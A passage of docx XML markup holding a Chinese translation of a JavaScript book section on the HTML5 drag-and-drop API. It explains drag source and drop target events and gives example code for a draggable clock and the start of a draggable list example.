        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>拖放源事件相当简单，我们就从它们开始。任何有</w:t>
      </w:r>
      <w:r>
        <w:t>HTML draggab le</w:t>
      </w:r>
      <w:r>
        <w:t>属性的文档元素都是拖放源。当用户开始用鼠标在拖放源上拖动时，浏览器并没有选择元素内容，相反，它在这个元素上触发</w:t>
      </w:r>
      <w:r>
        <w:t>dragstart</w:t>
      </w:r>
      <w:r>
        <w:t>事件。这个事件的处理程序就调用</w:t>
      </w:r>
      <w:r>
        <w:t>dataTransfer.setData()</w:t>
      </w:r>
      <w:r>
        <w:t>指定当前可用的拖放源数据（和</w:t>
      </w:r>
      <w:r>
        <w:t>数据类型）。（当新的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5 API</w:t>
      </w:r>
      <w:r>
        <w:t>实现时，可以用</w:t>
      </w:r>
      <w:r>
        <w:t>dataTransfer.items.add()</w:t>
      </w:r>
      <w:r>
        <w:t>代替。）这个事件处理程序也可以设置</w:t>
      </w:r>
      <w:r>
        <w:t>dataTransfer.effectAllowed</w:t>
      </w:r>
      <w:r>
        <w:t>来指定支持</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>移动</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>复制</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>链接</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>传输操作中的几种，同时它可以调用</w:t>
      </w:r>
      <w:r>
        <w:t>dataTransfer.setDragImage()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>dataTransfer.addElement()</w:t>
      </w:r>
      <w:r>
        <w:t>（在那些支持这些方法的浏览器中）指定图片或文档元素用做拖动时的视觉表现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在拖动的过程中，浏览器在拖放源上触发拖动事件。如果想更新拖动图片或修改提供的</w:t>
      </w:r>
      <w:r>
        <w:t>数据，可以监听这些事件，但一般不需要注册</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>拖动</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当放置数据发生时会触发</w:t>
      </w:r>
      <w:r>
        <w:t>dragend</w:t>
      </w:r>
      <w:r>
        <w:t>事件。如果拖放源支持</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>移动</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>操作，它就会检查</w:t>
      </w:r>
      <w:r>
        <w:t>dataTransfer.dropEffect</w:t>
      </w:r>
      <w:r>
        <w:t>去看看是否实际执行了移动操作。如果执行了，数据就被传输到其他地方，你应该从拖放源中删除它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>实现简单的自定义拖放源只需要</w:t>
      </w:r>
      <w:r>
        <w:t>dragstart</w:t>
      </w:r>
      <w:r>
        <w:t>事件。例</w:t>
      </w:r>
      <w:r>
        <w:t>17-4</w:t>
      </w:r>
      <w:r>
        <w:t>就是这样的例子，它在＜</w:t>
      </w:r>
      <w:r>
        <w:t>span</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中用</w:t>
      </w:r>
      <w:r>
        <w:t>"hh:mm"</w:t>
      </w:r>
      <w:r>
        <w:t>格式显示当前时间，并每分钟更新一次时间。假设这是示例要做的一切，用户能选择时钟中显示的文本，然后拖动这个时间。但在</w:t>
      </w:r>
      <w:r>
        <w:t>这个例子中</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码通过设置时钟元素的</w:t>
      </w:r>
      <w:r>
        <w:t>draggable</w:t>
      </w:r>
      <w:r>
        <w:t>属性为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>和定义</w:t>
      </w:r>
      <w:r>
        <w:t>ondragstart</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序函数来使得时钟成为自定义拖放源。事件处理程序使用</w:t>
      </w:r>
      <w:r>
        <w:t>dataTransfer.setData()</w:t>
      </w:r>
      <w:r>
        <w:t>指定一个完整的时间戳字符串（包括日期、秒和时区信息）作为待拖动的数据。它还调用</w:t>
      </w:r>
      <w:r>
        <w:t>dataTransfer.setDragIcon()</w:t>
      </w:r>
      <w:r>
        <w:t>指定待拖动的图片（一个时钟图标）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>17-4</w:t>
      </w:r>
      <w:r>
        <w:t>：一个自定义拖放源</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script src="whenReady.js"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>whe</w:t>
      </w:r>
      <w:r>
        <w:t>nReady(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var clock=document.getElementById("clock");//</w:t>
      </w:r>
      <w:r>
        <w:t>时钟元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var icon=new Image();//</w:t>
      </w:r>
      <w:r>
        <w:t>用于拖动的图片</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>icon.src="clock-icon.png";//</w:t>
      </w:r>
      <w:r>
        <w:t>图片</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>每分钟显示一次时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function displayTime(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var now=new Date();//</w:t>
      </w:r>
      <w:r>
        <w:t>获取当前时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var hrs=now.getHours(),mins=now.getMinutes();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(mins</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>10)mins="0"+mins;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>clock.innerHTML=hrs+":"+mins;//</w:t>
      </w:r>
      <w:r>
        <w:t>显示当前时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>setTimeout(displayTime,60000);//</w:t>
      </w:r>
      <w:r>
        <w:t>一分钟后将再次运行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>displayTime();//</w:t>
      </w:r>
      <w:r>
        <w:t>使时钟能够拖动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>我们也能通过</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性实现这个目的：＜</w:t>
      </w:r>
      <w:r>
        <w:t>span draggable="true"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>clock.draggable=true;//</w:t>
      </w:r>
      <w:r>
        <w:t>设置拖动事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>clock.ondragstart=function(event){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var eve</w:t>
      </w:r>
      <w:r>
        <w:t>nt=event||window.event;//</w:t>
      </w:r>
      <w:r>
        <w:t>用于</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>兼容性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//dataTransfer</w:t>
      </w:r>
      <w:r>
        <w:t>属性是拖放</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的关键</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var dt=event.dataTransfer;//</w:t>
      </w:r>
      <w:r>
        <w:t>告诉浏览器正在拖动的是什么</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>把</w:t>
      </w:r>
      <w:r>
        <w:t>Date()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数用做一个返回时间戳字符串的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>dt.setData("Text",Date()+"\n");//</w:t>
      </w:r>
      <w:r>
        <w:t>在支持的浏览器中，告诉它拖动图标来表现时间戳</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>没有这行代码，浏览器也可以使用时钟文本图像作为拖动的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(dt.setDragImage)dt.setDragImage(icon,0,0);</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style</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#clock{/*</w:t>
      </w:r>
      <w:r>
        <w:t>使时钟好看一些</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>font:bold 24pt sans;background:#ddf;padding:10px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>border:solid black 2px;border-radius:10px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/style</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞从时钟中拖出时间戳＜</w:t>
      </w:r>
      <w:r>
        <w:t>/h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>span id="clock"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/span</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>时间显示在这里</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>tex</w:t>
      </w:r>
      <w:r>
        <w:t>tarea cols=60 rows=20</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/textarea</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>把时间戳放置在这里</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>拖放目标比拖放源更棘手。任何文档元素都可以是拖放目标，这不需要像拖放源一样设置</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性，只需要简单地定义合适的事件监听程序。（但是使用新的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5 DnD API</w:t>
      </w:r>
      <w:r>
        <w:t>，将可以在拖放目标上定义</w:t>
      </w:r>
      <w:r>
        <w:t>dropzone</w:t>
      </w:r>
      <w:r>
        <w:t>属性来取代定义后面介绍的一部分事件处理程序。）有</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个事件在拖放目标上触发。当拖放对象（</w:t>
      </w:r>
      <w:r>
        <w:t>dragged object</w:t>
      </w:r>
      <w:r>
        <w:t>）进入文档元素时，浏览器在这个元素上触发</w:t>
      </w:r>
      <w:r>
        <w:t>dragenter</w:t>
      </w:r>
      <w:r>
        <w:t>事件。拖放目标应该使用</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>Transfer.types</w:t>
      </w:r>
      <w:r>
        <w:t>属性确定拖放对象的可用数据是否是它能理解的格式。（也可以检查</w:t>
      </w:r>
      <w:r>
        <w:t>data Transfer.effectAllowed</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>确保拖放源和拖放目标同意使用移动、复制和链接操作中的一个。）如果检查成功，拖放目标必须要让用户和浏览器都知道它对放置感兴趣。可以通过改变它的边框或背景颜色来向用户反馈。令人吃惊的是，拖放目标通过取消事件来告知浏览器它对放置感兴趣。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果元素不取消浏览器发送给它的</w:t>
      </w:r>
      <w:r>
        <w:t>dragenter</w:t>
      </w:r>
      <w:r>
        <w:t>事件，浏览器将不会把它作为这次拖放的拖放目标，并不会向它再发送任何事件。但如果拖放目标取消</w:t>
      </w:r>
      <w:r>
        <w:t>了</w:t>
      </w:r>
      <w:r>
        <w:t>dragenter</w:t>
      </w:r>
      <w:r>
        <w:t>事件，浏览器将发送</w:t>
      </w:r>
      <w:r>
        <w:t>dragover</w:t>
      </w:r>
      <w:r>
        <w:t>事件表示用户继续在目标上拖动对象。再一次令人吃惊的是，拖放目标必须监听且取消所有这些事情来表明它继续对放置感兴趣。如果拖放目标想指定它只允许移动、复制或链接操作，它应该使用</w:t>
      </w:r>
      <w:r>
        <w:t>dragover</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序来设置</w:t>
      </w:r>
      <w:r>
        <w:t>dataTransfrer.dropEffect</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果用户移动拖放对象离开通过取消事件表明有兴趣的拖放目标，那么在拖放目标上将触发</w:t>
      </w:r>
      <w:r>
        <w:t>dragleave</w:t>
      </w:r>
      <w:r>
        <w:t>事件。这个事件的处理程序应该恢复元素的边框或背景颜色或取消任何其他为响应</w:t>
      </w:r>
      <w:r>
        <w:t>dragenter</w:t>
      </w:r>
      <w:r>
        <w:t>事件而执行的</w:t>
      </w:r>
      <w:r>
        <w:t>可视化反馈。遗憾的是，</w:t>
      </w:r>
      <w:r>
        <w:t>dragenter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>dragleave</w:t>
      </w:r>
      <w:r>
        <w:t>事件会冒泡，如果拖放目标内部有嵌套元素，想知道</w:t>
      </w:r>
      <w:r>
        <w:t>dragleave</w:t>
      </w:r>
      <w:r>
        <w:t>事件表示拖放对象从拖放目标离开到目标外的事件还是到目标内的事件非常困难。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>最后，如果用户把拖放对象放置到拖放目标上，在拖放目标上会触发</w:t>
      </w:r>
      <w:r>
        <w:t>drop</w:t>
      </w:r>
      <w:r>
        <w:t>事件。这个事件的处理程序应该使用</w:t>
      </w:r>
      <w:r>
        <w:t>dataTransfer.getData()</w:t>
      </w:r>
      <w:r>
        <w:t>获取传输的数据并做一些适当的处理。另外，如果用户在拖放目标放置一或多个文件，</w:t>
      </w:r>
      <w:r>
        <w:t>dataTransfer.files</w:t>
      </w:r>
      <w:r>
        <w:t>属性将是一个类数组的</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象。（见例</w:t>
      </w:r>
      <w:r>
        <w:t>18-11</w:t>
      </w:r>
      <w:r>
        <w:t>的说明。</w:t>
      </w:r>
      <w:r>
        <w:t>）使用新的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5 API</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>drop</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序将能遍历</w:t>
      </w:r>
      <w:r>
        <w:t>dataTransfer.items[]</w:t>
      </w:r>
      <w:r>
        <w:t>的元素去检查文件和非文件数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>17-5</w:t>
      </w:r>
      <w:r>
        <w:t>演示如何使＜</w:t>
      </w:r>
      <w:r>
        <w:t>ul</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素成为拖放目标，同时如何使它们中的＜</w:t>
      </w:r>
      <w:r>
        <w:t>li</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素成为拖放源。这个示例是一段不唐突的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
      <w:r>
        <w:t>代码，它查找</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性包含</w:t>
      </w:r>
      <w:r>
        <w:t>"dnd"</w:t>
      </w:r>
      <w:r>
        <w:t>的＜</w:t>
      </w:r>
      <w:r>
        <w:t>ul</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，在它找到的此类列表上注册</w:t>
      </w:r>
      <w:r>
        <w:t>DnD</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序。这些事件处理程序使列表本身成为拖放目标，在这个列表上放置的任何文本会变成新的列表项并插入到列表尾部。这些事件处理程序也监听列表项的拖动，使得每个列</w:t>
      </w:r>
      <w:r>
        <w:t>表项的文本可用于传输。拖放源事件处理程序允许</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>复制</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>移动</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>操作，并在移动操作下放置对象时会删除原有列表项。（但是，请注意并不是所有的浏览器都支持移动操作。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>17-5</w:t>
      </w:r>
      <w:r>
        <w:t>：作为拖放目标和拖放源的列表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*DnD API</w:t>
      </w:r>
      <w:r>
        <w:t>相当复杂，且浏览器也不完全兼容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这个例子基本正确，但每个浏览器会有一点不同，每个似乎都有自身独有的</w:t>
      </w:r>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这些代码不会尝试浏览器特有的解决方案</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>whenReady(function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>当文档准备就绪时运行这个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>查找所有的＜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ul </w:t>
      </w:r>
      <w:r>
        <w:t>class='dnd'</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，并对其调用</w:t>
      </w:r>
      <w:r>
        <w:t>dnd()</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var lists=document.getElementsByTagName("ul");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var regexp=/\bdnd\b/;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
